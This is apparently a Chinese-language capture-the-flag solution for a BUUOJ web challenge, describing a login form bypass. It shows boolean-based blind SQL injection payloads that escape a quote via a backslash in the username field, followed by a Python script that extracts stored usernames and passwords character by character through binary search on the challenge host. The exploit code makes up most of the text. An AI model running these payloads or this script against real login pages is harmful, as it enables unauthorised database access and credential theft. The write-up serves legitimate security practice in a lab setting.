解题
访问hint.txt
username处可以用\
来转义单引号,password处使用sql语句整数型注入。
传入
admin\
和or/**/length(database())>0#
会回显stronger字样
传入admin\
和or/**/length(database())<0#
会回显girl friend字样
直接用脚本
import requests
url = "http://eeeed83e-4ab8-4328-adbd-e4caf8d13b84.node3.buuoj.cn/index.php"
data = {"username": "admin\\", "password": ""}
result = ""
i = 0
while (True):
i = i + 1
head = 32
tail = 127
while (head < tail):
mid = (head + tail) >> 1
payload = "or/**/if(ascii(substr(username,%d,1))>%d,1,0)#"%(i,mid)
# payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#" % (i, mid)
data['password'] = payload
r = requests.post(url, data=data)
if "stronger" in r.text:
head = mid + 1
else:
tail = mid
last = result
if head != 32:
result += chr(head)
else:
break
print(result)